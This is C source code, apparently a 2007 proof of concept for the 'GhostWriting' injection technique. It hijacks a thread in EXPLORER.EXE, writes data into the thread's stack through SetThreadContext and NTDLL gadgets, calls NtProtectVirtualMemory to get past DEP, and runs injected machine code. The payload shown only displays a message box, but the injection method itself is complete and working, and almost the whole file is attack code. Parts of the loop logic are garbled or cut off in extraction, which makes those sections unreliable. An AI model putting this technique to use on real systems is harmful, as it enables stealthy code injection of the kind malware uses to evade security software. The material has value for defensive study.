////// // Proof Of Concept for GhostWriting technique by c0de90e7. Spring '2007 // // #include HWND STDCALL GetShellWindow(void); // Machine code bytes that we will inject into EXPLORER.EXE. When this snippet // gets executed, it will launch a MessageBox and then return to the address // indicated in ESI register. ESI will point to a EBFE ( JMP $ ) found into // NTDLL.DLL, so the hijacked thread will enter an auto-lock state after the // user clicks OK in this MessageBox. UCHAR InjectionCode[]={ 0x6A,0x00, // PUSH 0 0xE8,0x0D,0x00,0x00,0x00, // CALL NEXT // Caption text 'G','h','o','s','t','W','r','i','t','i','n','g',0x00, 0xE8,0x1D,0x00,0x00,0x00, // CALL NEXT // Message text 'R','u','n','n','i','n','g',' ','i','n','t','o',' ','E','X','P','L','O','R','E','R','.','E','X','E','.','.','.',0x00, 0x6A,0x00, // PUSH 0 0x56, // PUSH ESI ; ( return address where MessageBoxA should return, we will set ESI so that in points to a EBFE ) 0x68,0x00,0x00,0x00,0x00, // PUSH MessageBoxA ; ( we will change those 00s to MessageBoxA address in runtime ) 0xC3 }; // RET // This routine will set thread's context to the values we want and wait till // thread's EIP reaches a point we indicate. For this proof of concept, we // will also post some GUI messages to the hijacked thread, so that thread's // common "wait for messages" nature doesn't slow things down. // void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext,HWND ThreadsWindow,DWORD AutoLockTargetEIP) { SetThreadContext(Thread,PThreadContext); PostMessage(ThreadsWindow,WM_USER,0,0); PostMessage(ThreadsWindow,WM_USER,0,0); PostMessage(ThreadsWindow,WM_USER,0,0); do { ResumeThread(Thread); Sleep(30); // This could also be Sleep(0) ( Yield, as NtYieldExecution would do ), but in some cases ( windows server versions ) this would // lead to slowdowns or even starvation of the hijacked thread's execution. I have not done further research into this matter, but // I think this is due to the fact that those server versions of windows prioritize non-GUI thread's execution over GUI thread's // execution by default. SuspendThread(Thread); GetThreadContext(Thread,PThreadContext); } while(PThreadContext->Eip!=AutoLockTargetEIP); } // This routine will disassemble a possible "MOV [REG1],REG2" or "MOV [REG1+xx],REG2" instruction and validate its REG1 and REG2 registers so that: // a) They are EBX, EBP, ESI or EDI. We need them to be one of those, since they are the only stable ones when it comes to setting thread's context. // b) They are not the same ( REG1!=REG2 ). We need them to be different because we will use REG1 to point to memory and REG2 to write a DWORD. // int DisassembleAndValidateMOV(PUCHAR InstructionMemoryBase,ULONG* InstructionMemoryIndex,CONTEXT* PThreadContextBase,DWORD** WritePointer,DWORD** WriteItem,int* MOVRETOffsetFromMemoryRegister) { UCHAR WritePointerRegIndex,WriteItemRegIndex,ModRM; DWORD* ArrayOfValidRegisterAddressesInContext[8]; // Valid register addresses ( non-volatile ones ). NOTE, ESP is not volatile, but we will not be using it either. ArrayOfValidRegisterAddressesInContext[0]=NULL; // EAX, not valid. ArrayOfValidRegisterAddressesInContext[1]=NULL; // ECX, not valid. ArrayOfValidRegisterAddressesInContext[2]=NULL; // EDX, not valid. ArrayOfValidRegisterAddressesInContext[3]=&PThreadContextBase->Ebx; // EBX, valid, non-volatile, stable for setting it with SetThreadContext. ArrayOfValidRegisterAddressesInContext[4]=NULL; // ESP, valid, but we will not use it. ArrayOfValidRegisterAddressesInContext[5]=&PThreadContextBase->Ebp; // EBX, valid, non-volatile, stable for setting it with SetThreadContext. ArrayOfValidRegisterAddressesInContext[6]=&PThreadContextBase->Esi; // ESI, valid, non-volatile, stable for setting it with SetThreadContext. ArrayOfValidRegisterAddressesInContext[7]=&PThreadContextBase->Edi; // EDI, valid, non-volatile, stable for setting it with SetThreadContext. if(InstructionMemoryBase[*InstructionMemoryIndex]==0x89) // Is it a "MOV /r" instruction ? { ModRM=InstructionMemoryBase[*InstructionMemoryIndex+1]; // if it is, we pick next byte, ModRM. We will split it into Mod,dstRM,srcRM. if((ModRM&0x80)!=0) // We need Mod field to be 00 or 01. return FALSE; WritePointerRegIndex=ModRM&0x07; // We pick dstRM ( destination register ). WriteItemRegIndex=(ModRM>>3)&0x07; // We pick srcRM ( source register ). if(WritePointerRegIndex==WriteItemRegIndex) // condition "b)", we need source and destination registers to be different REG1!=REG2. return FALSE; if((ModRM&0x40)==0) // if Mod field is 00, it is a "MOV [REG1],REG2" instruction. Otherwise, if it is 01, it is a "MOV [REG1+xx],REG2". { // Mod == 00 => "MOV [REG1],REG2" if(WritePointerRegIndex==5) // This is a sub-case of "MOV [REG1],REG2" that has to be discarded. When Mod is 00 and destination RM is return FALSE; // 5 ( the value that would indicate EBP ), the instruction is not "MOV [EBP],REG2", it turns out to be // "MOV [immediate32],REG2" instead. That immediate32 is a 32 bit address that gets encoded just after // this ModRM byte ( 89 RM YY YY YY YY, or 89, ModRM byte, immediate32 DWORD ). *MOVRETOffsetFromMemoryRegister=0; // See Inject routine. This variable will hold the displacement over REG1 register. Since this is // is the case of a "MOV [REG1],REG2", there is no displacement over REG1, so we set it to 0. *InstructionMemoryIndex+=2; // We increment the instruction memory index by 2, because that's the size of this instruction ( 89 RM ). } else { // Mod == 01 => "MOV [REG1+xx],REG2" *MOVRETOffsetFromMemoryRegister=(signed char)InstructionMemoryBase[*InstructionMemoryIndex+2]; // In this case, that "xx" of the // instruction is a byte and gets // encoded just after the ModRM byte // ( 89 RM xx ). So we pick it from // instruction memory and set it to // this variable as a sign extended // byte. // NOTE: MOVRETOffsetFromMemoryRegister // is a 32 bit integer while this "xx" // found in the instruction is a 8 bit // integer, thats why we sign extend it // by that cast, otherwise, it would not // work properly in negative "xx" cases. *InstructionMemoryIndex+=3; // As we have seen, the encoding of this case takes 3 bytes ( 89 RM xx ), so we increment instruction memory // index by 3. } // If the picked registers are valid ( not NULL ), we set them to WritePointer and WriteItem. if ((ArrayOfValidRegisterAddressesInContext[WritePointerRegIndex]!=NULL)&&(ArrayOfValidRegisterAddressesInContext[WriteItemRegIndex]!=NULL)) { *WritePointer=ArrayOfValidRegisterAddressesInContext[WritePointerRegIndex]; *WriteItem=ArrayOfValidRegisterAddressesInContext[WriteItemRegIndex]; } else return FALSE; return TRUE; // If we reach this point, all the needed requirements have been met. } else return FALSE; } // This is the core routine of this PoC. It will hijack a thread, inject code // to it's stack ( although it could be anywhere... ) and finally run that code // afterwards. // // NOTE: This function gets hijacked thread's handle, a pointer and a size of // the code we want and what may seem lees obvious, a window handle owned by // the hijacked thread. We will use that handle to call WaitForThreadAutoLock // ( see WaitForThreadAutoLock ). // int Inject(HANDLE Thread,DWORD* InjectionCode,ULONG NumberOfDWORDsToInject,HWND ThreadsWindow) { CONTEXT SavedThreadContext; // This will hold the initial hijacked thread's register state, so that we can resume thread's execution in its // original state after we have finished our injection task. CONTEXT WorkingThreadContext; // This one will hold hijacked thread's state while the thread is hijacked. We will do Get/SetThreadContexts as // many times as needed, that's what this technique is all about... DWORD* WritePointer; // This two pointers will point into some fields into WorkingThreadContext in order to abstract the registers used in the DWORD* WriteItem; // "MOV [REG1],REG2" instruction that the hijacked thread will be executing. See DisassembleAndValidateMOV routine. DWORD JMPTOSELFAddress,MOVRETAddress; // This two are the addresses of a EBFE ( JMP $ ) and a "MOV [REG1],REG2"+"RET" respectively. We will find // them into NTDLL.DLL's code sections ( it could be into any module or even other places... ) and we will // divert hijacked thread's execution to them. int MOVRETOffsetFromMemoryRegister; // See DisassembleAndValidateMOV, this variable holds the displacement over REG1 register found in instruction // "MOV [REG1],REG2" or "MOV [REG1+xx],REG2". If we find a "MOV [REG1],REG2", then this variable will be set // to 0, otherwise, if we find a "MOV [REG1+xx],REG2", this variable will be set to that "xx" value. ULONG NumberOfBytesToPopAfterMOVBeforeRET; // We will look for a pattern like this: // MOV [REG1],REG2 // RET // But in order to be more flexible, since this pattern is not very common, we will also accept // patterns like this: // MOV [REG1],REG2 // POP REGx // POP REGx // ... // RET // This pattern is far more common, it is indeed very common as function's epilogue. // So, in order to support working with this pattern, we need to control the amount of stack balancing // that will take place after that "MOV [REG1],REG2" and before that "RET". We will count the number of // POP instructions between the MOV and the RET and we will also accept "ADD REG,yy" instructions // ( which are very common instructions also ), and check if that REG is ESP, taking that "yy" into // account if that's the case. DWORD BASEOfWrittenBytes,DWORDWritingPointer; DWORD InjectedCodeExecutionStart; DWORD NtProtectVirtualMemoryAddress; // This will hold the address of NtProtectVirtualMemory API into NTDLL.DLL. We will divert hijacked // thread's execution flow to that API in the last step of the injection, before actually executing the // injected code. The purpose of this step ( see next array also ) is to make our injected code bytes that // have been stored into hijacked thread's stack be PAGE_EXECUTE_READWRITE. By setting thread's EIP to the // NtProtectVirtualMemory API and setting thread's ESP to a copy of NtProtectVirtualMemoryCallFrame ( that // we will also inject to the hijacked thread's stack ), we will simulate a call as if the hijacked thread // itself did the call. This is based on common anti-DEP techniques theory used in some buffer overflow // exploitation for DEP enabled machines. DWORD NtProtectVirtualMemoryCallFrame[1+5+3]= { 0, // return address that will point to JMPTOSELF 0xFFFFFFFF, // (pseudo)handle of current process 0, // pointer that will point to base address of memory region (1) 0, // pointer that will point to size of memory region (2) PAGE_EXECUTE_READWRITE, // protection flags 0, // pointer that will point to a DWORD where original protection flags will be stored (3) 0, // [1] base address of the memory region where the protection flags are to be changed 0, // [2] size of the memory region where the protection flags are to be changed 0 }; // [3] DWORD to get original protection flags HMODULE NTDLLBase; PUCHAR NTDLLCode; PIMAGE_NT_HEADERS NTDLLPEHeader; ULONG NTDLLCodeSize,i,j,k; NTDLLBase=GetModuleHandle("NTDLL.DLL"); // We get NTDLL.DLLs module base. NtProtectVirtualMemoryAddress=(DWORD)GetProcAddress(NTDLLBase,"NtProtectVirtualMemory"); // We solve NtProtectVirtualMemory API address. NTDLLCode=(PUCHAR)((ULONG)NTDLLBase+0x00001000); // Assume first section starts at Base+1000h, and assume it is a code section... NTDLLPEHeader=(PIMAGE_NT_HEADERS)((ULONG)NTDLLBase+((IMAGE_DOS_HEADER*)NTDLLBase)->e_lfanew); // We get total code size ( of all the code NTDLLCodeSize=NTDLLPEHeader->OptionalHeader.SizeOfCode; // sections in NTDLL.DLL ). We also assume those // code sections are all contiguous... JMPTOSELFAddress=MOVRETAddress=(DWORD)NULL; i=0; while((i Number of bytes reserved to hold arbitrary ( we just need the space to be there ) bytes, so that the "POP REGx" and/or "ADD REGx,yy" // instructions we have found after the "MOV [REG1],REG2", increment ESP to fit into the next item. // // [2] 4 > This is the important one. DWORD sized space that will hold a return address. The RET instruction, which comes after the // "MOV [REG1],REG2" and other possible "POP REGx" and/or "ADD REGx,yy" instructions, will pop this return address and divert // execution of the thread to that address. // // [3] 36 > This will hold 9 DWORDs of a simulated stack frame for a call to NtProtectVirtualMemory API. 1 DWORD for a return address + 5 DWORDs // for the 5 parameters that API function takes + 3 DWORDs for storing 3 local DWORDs that will be pointed to by 3 out of those 5 // parameters. Those 3 pointed parameters are output variables the API needs. // // [4] > DWORD boundary aligned size of the machine code we are going to inject and later execute. // BASEOfWrittenBytes=WorkingThreadContext.Esp-((NumberOfDWORDsToInject*sizeof(DWORD))+((1+5+3)*sizeof(DWORD))+sizeof(DWORD)+NumberOfBytesToPopAfterMOVBeforeRET); // // STACK STATUS // ____________________ // | |<--- Stack Bottom // | | // | |<--- ,*WritePointer ( REG1 ) == BASEOfWrittenBytes - MOVRETOffsetFromMemoryRegister + NumberOfBytesToPopAfterMOVBeforeRET (1) // | | ,-| + // | | | `MOVRETOffsetFromMemoryRegister ( 0 if using "MOV [REG1],REG2", xx if using "MOV [REG1+xx],REG2" ) // |____________________| `-------------------------------------. // | |<--- ,ESP == BASEOfWrittenBytes (2) | // | dummy a | ,-| + | // | dummy b | | `NumberOfBytesToPopAfterMOVBeforeRET | // | . | | | // | . | | | // | dummy z | | | // |____________________| | | // | return address (3) |/<-� | // |____________________|\<----------------------------------------� // | | // | | // | | SOMEWHERE INTO NTDLL.DLL's CODE // | | ________________________________________ // | | (3) EIP == MOVRETAddress --->| | // | | | MOV [REG1],REG2 / MOV [REG1+xx],REG2 | // | | | ( POP REGx / ADD REGx,yy ) | // | | | . | // | | | . | // | | | RET / RET n | // | | |________________________________________| // | | // | | // | | SOMEWHERE INTO NTDLL.DLL's CODE // | | _______________________________ // | | (4) *WriteItem ( REG2 ) == JMPTOSELFAddress --->| | // | | | JMP $ | // | | |_______________________________| // | | // | | // | | // |____________________| // | |<--- Initial ESP // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // |____________________|<--- Stack Top // // // [1] WritePointer points to some register field into WorkingThreadContext ( REG1 in that "MOV [REG1],REG2", see DisassembleAndValidateMOV ) // and we set that chosen register's value so that REG1+MOVRETOffsetFromMemoryRegister points to the same place where thread's ESP ( see // [2], will have the same value as BASEOfWrittenBytes )+NumberOfBytesToPopAfterMOVBeforeRET points. *WritePointer=BASEOfWrittenBytes-MOVRETOffsetFromMemoryRegister+NumberOfBytesToPopAfterMOVBeforeRET; // [2] we set the new ESP, just the initial ESP minus the number of bytes needed for our injection WorkingThreadContext.Esp=BASEOfWrittenBytes; // [3] we divert thread's execution to one of the patterns we have found found: "MOV [REG1],REG2"+...+"RET". WorkingThreadContext.Eip=MOVRETAddress; // [4] WriteItem points to some register field into WorkingThreadContext ( REG2 in that "MOV [REG1],REG2", see DisassembleAndValidateMOV ) and // we set its value so that it points to the other pattern we found: "JMP $". *WriteItem=JMPTOSELFAddress; // Now the trick itself: we let thread's execution continue ( see WaitForThreadAutoLock ) and wait till its EIP register gets a value of // JMPTOSELFAddress, this is what happens: // // a) The thread executes that "MOV [REG1],REG2" or "MOV [REG1+xx],REG2": since REG1 or REG1+xx point to a DWORD in stack which is going to be // popped out as a return address, after this instruction gets executed, REG2's value will be stored in stack as a return address. // b) After that "MOV [REG1],REG2" or "MOV [REG1+xx],REG2", some "POP REGx" and/or "ADD REGx,yy" may come. Those are useless for our trick, we // have just taken them into account for stack balancing calculations ( see NumberOfBytesToPopAfterMOVBeforeRET calculations in that while{} // loop before ). So those "POP REGx" and/or "ADD REGx,yy" could make ESP advancements, but they are ok since we determined which value ESP // will take before executing the next RET instruction. // c) After that set of "POP REGx" and/or "ADD REGx,yy" instructions, we reach a "RET" or "RET n" instruction, so ESP points to a return address // and ( see "a)" ) that return address has REG2's value, which, if you look at [4] step before, points to a "JMP $" instruction. So after // this "RET" or "RET n" executes, thread's execution will be diverted to a "JMP $", which, you can see that, makes the thread enter an // auto-lock state. // d) This WaitForThreadAutoLock routine will eventually see how the hijacked thread's execution reached that auto-lock state ( I mean, EIP gets // a value equal to JMPTOSLEFAddress ) and let us continue with our thread manipulation tasks... };> WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress); // Ooookkaayyy, pretty complex thread manipulation but... what have we achieved so far ? Nothing... nothing ? Not yet, but keep going. This is // what we have achieved: // // // STACK STATUS // ____________________ // | |<--- Stack Bottom // | | // | | // | | // | | // |____________________| // | |<--- BASEOfWrittenBytes // | dummy a | // | dummy b | // | . | // | . | // | dummy z | // |____________________| // | JMPTOSELFAddress -------------------. // |____________________| | // | |<--- ESP | // | | | // | | | // | | | // | | | // | | | // | | | // | | | // | | | // | | | // | | | // | | | // | | | // | | | SOMEWHERE INTO NTDLL.DLL's CODE // | | | _______________________________ // | | | EIP == JMPTOSELFAddress --->\| | // | | `--------------------------------->/| JMP $ | // | | |_______________________________| // | | // | | // | | // |____________________| // | |<--- Initial ESP // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // |____________________|<--- Stack Top // // // So... it may seem we have nothing here, but we do have something. That return address is now an address that points to "JMP $", this means // that, from now on, we can repeat the process as many times as we need/want and we no longer need REG1 to point to that return address and // we no longer need that REG2 to point to "JMP $" instruction. We must simply readjust thread's ESP to point to the same initial point we gave // it the previous time ( BASEOfWrittenBytes ) and readjust EIP so that it points to the same initial address of the previous time ( that is, // MOVRETAddress ). We can set REG1 to be "anywhere" and set REG2 to be "anything", so, from now on, we can write any DWORD to any place. Get // the idea ? // What comes next is a loop for writing 9 DWORDs that represent a simulated call frame to NtProtectVirtualMemory API. We will simulate a call // to this API in order to mark our injection memory ( a range of bytes into the region we reserved for the injection in the stack ) as // PAGE_EXECUTE_READWRITE, so that DEP ( Data Execution Prevention ) does not stop us from executing the injected code later on. Let's see // NtProtectVirtualMemory's C language prototype: // // NtProtectVirtualMemory( IN HANDLE ProcessHandle, // IN OUT PVOID *BaseAddress, // IN OUT PULONG NumberOfBytesToProtect, // IN ULONG NewAccessProtection, // OUT PULONG OldAccessProtection ); // // Okay, so, it takes 5 parameters, why 9 DWORDs then ? // // | SIMULATED RETADDR | (1) 1st DWORD: This will hold the address to where the API would return after doing its job, // | p.1: ProcessHandle | 2nd DWORD: This will hold 0xFFFFFFFF ( -1, current process, see NtProtectVirtualMemoryCallFrame ), // | p.2: &BaseAddress -----------. (2) 3rd DWORD: We will make this have a pointer to the 7th DWORD, // | p.3: &NumBytesProt --------. | (3) 4th DWORD: We will make this have a pointer to the 8th DWORD, // | p.4: NewAccessProt | | | 5th DWORD: This will hold PAGE_EXECUTE_READWRITE ( see NtProtectVirtualMemoryCallFrame ), // | p.5: &OldAccessPrt ----. | | (4) 6th DWORD: We will make this have a pointer to the 9th DWORD, // | BaseAddress |<--+---+-� (5) 7th DWORD: We will make this to be a pointer to our injection's executable code ( put in the stack ) // | NumBytesProt |<--+---� (6) 8th DWORD: We will make this to be the size of our injection's executable code. // | OldAccessPrt |<--� 9th DWORD: We do not care about this, we just need to reserve the space... // // [1] We need to be able to synchronize the moment when NtProtectVirtualMemory finishes and make the thread stop there, so we set this DWORD to // JMPTOSELFAddress ( address of "JMP $" instruction ). NtProtectVirtualMemoryCallFrame[0]=JMPTOSELFAddress; // [2] We make the 3rd DWORD point to the 7th DWORD, as we are going to write this 9 DWORD array to the stack, just after the return address // we have been using in the previous step, we make the pointer calculations like this: // // BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+... // BASE + skip dummy DWORDs that will be popped + skip return address+... ( those "..." are the BASE for this 9 DWORD array ). // // So in this case, to point to 7th DWORD, we need to skip those and then skip 1 more DWORD for the return address of this call frame plus 5 // DWORDs for the 5 parameters. NtProtectVirtualMemoryCallFrame[2]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+0)*sizeof(DWORD)); // [3] We make the 4th DWORD point to the 8th DWORD, we do it as we did it for [2], but we skip a DWORD more NtProtectVirtualMemoryCallFrame[3]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+1)*sizeof(DWORD)); // [4] We make the 6th DWORD point to the 9th DWORD, we do it as we did it for [2], but we skip two more DWORDs NtProtectVirtualMemoryCallFrame[5]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+2)*sizeof(DWORD)); // [5] This is not as the previous 3, this is not a parameter, it is a local variable, pointed by parameter 2 ( 3rd DWORD ). We make it point // to a point in the stack where we will be injecting executable code. That point will be just after this 9 DWORD call frame, thats why // we skip one more DWORD. NtProtectVirtualMemoryCallFrame[6]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+3)*sizeof(DWORD)); // [6] We make 8th DWORD be the size that our injected executable code has NtProtectVirtualMemoryCallFrame[7]=NumberOfDWORDsToInject*sizeof(DWORD); // Here we write those 9 DWORDs into thread's stack space // // STACK STATUS // ____________________ // | |<--- Stack Bottom // | | // | | // | | // | | // |____________________| // | |<--- ,ESP == BASEOfWrittenBytes // | dummy a | ,-| + // | dummy b | | `NumberOfBytesToPopAfterMOVBeforeRET // | . | | // | . | | // | dummy z | | ( for i from 0 to 8 )---. // |____________________| | | // | JMPTORETAddress |<--� *WriteItem ( REG2 ) == NtProtectVirtualMemoryCallFrame[i] <-| // |_______ | __________| ,MOVRETOffsetFromMemoryRegister | // | | |<---| - | // | | | . `*WritePointer ( REG1 ) == BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+i*4 <-� // | | | . SOMEWHERE INTO NTDLL.DLL's CODE // | | | . ________________________________________ // | | | EIP == MOVRETAddress --->| | // | | | | MOV [REG1],REG2 / MOV [REG1+xx],REG2 | // | | | | ( POP REGx / ADD REGx,yy ) | // | | | | . | // | | | | . | // | | | | RET / RET n | // | | | |________________________________________| // | | | // | | | // | | | SOMEWHERE INTO NTDLL.DLL's CODE // | | | _______________________________ // | `--------------------------------------------------------------->| | // | | | JMP $ | // | | |_______________________________| // | | // | | // | | // |____________________| // | |<--- Initial ESP // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // |____________________|<--- Stack Top // // DWORDWritingPointer=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD); for(i=0;i<9;i++) { WorkingThreadContext.Esp=BASEOfWrittenBytes; *WritePointer=DWORDWritingPointer-MOVRETOffsetFromMemoryRegister; *WriteItem=NtProtectVirtualMemoryCallFrame[i]; WorkingThreadContext.Eip=MOVRETAddress; WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress); DWORDWritingPointer+=sizeof(DWORD); } // After this for executes, we have the NtProtectVirtualMemory call frame written to the hijacked thread's stack: // // // STACK STATUS // ____________________ // | |<--- Stack Bottom // | | // | | // | | // | | // |____________________| // | |<--- BASEOfWrittenBytes // | dummy a | // | dummy b | // | . | // | . | // | dummy z | // |____________________| // | JMPTOSELFAddress -------------------. // |____________________| | // | SIMULATED RETADDR |<--- ESP | // | p.1: ProcessHandle | | // | p.2: &BaseAddress -----------. | // | p.3: &NumBytesProt --------. | | // | p.4: NewAccessProt | | | | // | p.5: &OldAccessPrt ----. | | | // | BaseAddress --. |<--+---+-� | // | NumBytesProt | |<--+---� | // | OldAccessPrt | |<--� | // |-------------- v ---| | // | | | // | | | // | | | // | | | SOMEWHERE INTO NTDLL.DLL's CODE // | | | _______________________________ // | | | EIP == JMPTOSELFAddress --->\| | // | | `--------------------------------->/| JMP $ | // | | |_______________________________| // | | // | | // | | // |____________________| // | |<--- Initial ESP // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // |____________________|<--- Stack Top // // // NOTE: One could say that that return address ( JMPTOSELFAddress ) is put twice and that we could have optimized this by not writing it again, // it's true. However, I preferred to isolate this call frame from the previous stack stuff in order to make it more clear and also more // generic. // Ok, so we have set up that call frame for later usage, we could run that call to NtProtectVirtualMemory now, but, for the sake of clearness, // let's make the writings first and let the executions for the ending part. So let's write our last bytes, the injection executable bytes. See // how DWORDWritingPointer points just ahead of the previously written call frame, so we do not need to calculate it again, it actually points // where it needs to. // We save current DWORDWritingPointer's value in order to set thread's EIP to that value later on ( in injection execution phase ). InjectedCodeExecutionStart=DWORDWritingPointer; // Here we write executable code bytes, DWORD by DWORD, into thread's stack space // // STACK STATUS // ____________________ // | |<--- Stack Bottom // | | // | | // | | // | | // |____________________| // | |<--- ,ESP == BASEOfWrittenBytes // | dummy a | ,-| + // | dummy b | | `NumberOfBytesToPopAfterMOVBeforeRET // | . | | // | . | | // | dummy z | | ( for i from 0 to NumberOfDWORDsToInject )---. // |____________________| | | // | JMPTORETAddress |<--� *WriteItem ( REG2 ) == InjectionCode[i] <-| // || __________________| ,MOVRETOffsetFromMemoryRegister | // ||SIMULATED RETADDR | ,-| - | // ||p.1: ProcessHandle | | `*WritePointer ( REG1 ) == DWORDWritingPointer+i*4 <-------------------------------------� // ||p.2: &BaseAddress -----------. | SOMEWHERE INTO NTDLL.DLL's CODE // ||p.3: &NumBytesProt --------. | | ________________________________________ // ||p.4: NewAccessProt | | | | EIP == MOVRETAddress --->| | // ||p.5: &OldAccessPrt ----. | | | | MOV [REG1],REG2 / MOV [REG1+xx],REG2 | // ||BaseAddress --. |<--+---+-� | | ( POP REGx / ADD REGx,yy ) | // ||NumBytesProt | |<--+---� | | . | // ||OldAccessPrt | |<--� | | . | // || ------------ v ---| | | RET / RET n | // || |<--------------� |________________________________________| // || | . // || | . // || | . SOMEWHERE INTO NTDLL.DLL's CODE // || | _______________________________ // |`----------------------------------------------------------------------->| | // | | | JMP $ | // | | |_______________________________| // | | // | | // | | // |____________________| // | |<--- Initial ESP // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // |____________________|<--- Stack Top // // for(i=0;i\| | // | EXECUTABLE CODE | `--------------------------------->/| JMP $ | // | EXECUTABLE CODE | |_______________________________| // | EXECUTABLE CODE | // | EXECUTABLE CODE | // | EXECUTABLE CODE | // |____________________| // | |<--- Initial ESP // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // | USED STACK SPACE | // |____________________|<--- Stack Top // // // Ok, all the needed stuff has been written to the hijacked stack. As we said before, first we write, then we execute. All written, let's run ! // We will first run the NtProtectVirtualMemory with our written, simulated call frame: WorkingThreadContext.Esp=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD); // We make thread's ESP point into the call frame WorkingThreadContext.Eip=NtProtectVirtualMemoryAddress; // and set thread's EIP point to the address of that API into NTDLL.DLLs code. This two // changes simulate the call. I hope you will understand it yourself this time WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress); // And finally, the moment we have all been waiting for. WorkingThreadContext.Esp=BASEOfWrittenBytes; // set ESP to a "safe" place WorkingThreadContext.Esi=JMPTOSELFAddress; // injected code expects ESI to be its "EXIT ADDRESS" ( see InjectionCode array declaration ) WorkingThreadContext.Ebx=BASEOfWrittenBytes; // injected code also expects EBX to be its "Delta Handle" or memory base address of its own WorkingThreadContext.Eip=InjectedCodeExecutionStart; // set EIP to the base address where the injected executable code starts WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress); // and... RUN !!! // alllllll donnneee ! let's let hijacked thread loose so it enjoys is silly life again ��... SetThreadContext(Thread,&SavedThreadContext); // restore initial thread's original state and restore it... ResumeThread(Thread); // and resume its execution PostMessage(ThreadsWindow,WM_USER,0,0); // Just in case, send a message to awake its wait... return TRUE; // all went fine } else // else, we did not found those two patterns return FALSE; // so we return with error... } void main(void) { HWND ShellWindowHandle; DWORD ShellWindowThread; HANDLE VictimThreadHandle; // We solve MessageBoxA APIs address... HMODULE USER32Base=LoadLibrary("USER32.DLL"); DWORD MessageBoxAAddress=(DWORD)GetProcAddress(USER32Base,"MessageBoxA"); FreeLibrary(USER32Base); *(DWORD*)(&InjectionCode[58])=MessageBoxAAddress; // And we put that address into InjectionCode ( see InjectionCode array declaration ) // We get our victim thread ShellWindowHandle=GetShellWindow(); // by first getting a handle of a window it owns ShellWindowThread=GetWindowThreadProcessId(ShellWindowHandle,NULL); // and then getting the owning thread ID of that window VictimThreadHandle=OpenThread(THREAD_SET_CONTEXT|THREAD_GET_CONTEXT|THREAD_SUSPEND_RESUME,FALSE,ShellWindowThread); // We open victim thread // And we try our injection technique over it if (Inject(VictimThreadHandle,InjectionCode,(sizeof(InjectionCode)+4)/4,ShellWindowHandle)) MessageBox(NULL,"SUCCESS ! ;D","GhostWriting: Proof Of Concept",0); // Yay ! else MessageBox(NULL,"FAILURE ! ","GhostWriting: Proof Of Concept",0); // Ouch :S CloseHandle(VictimThreadHandle); }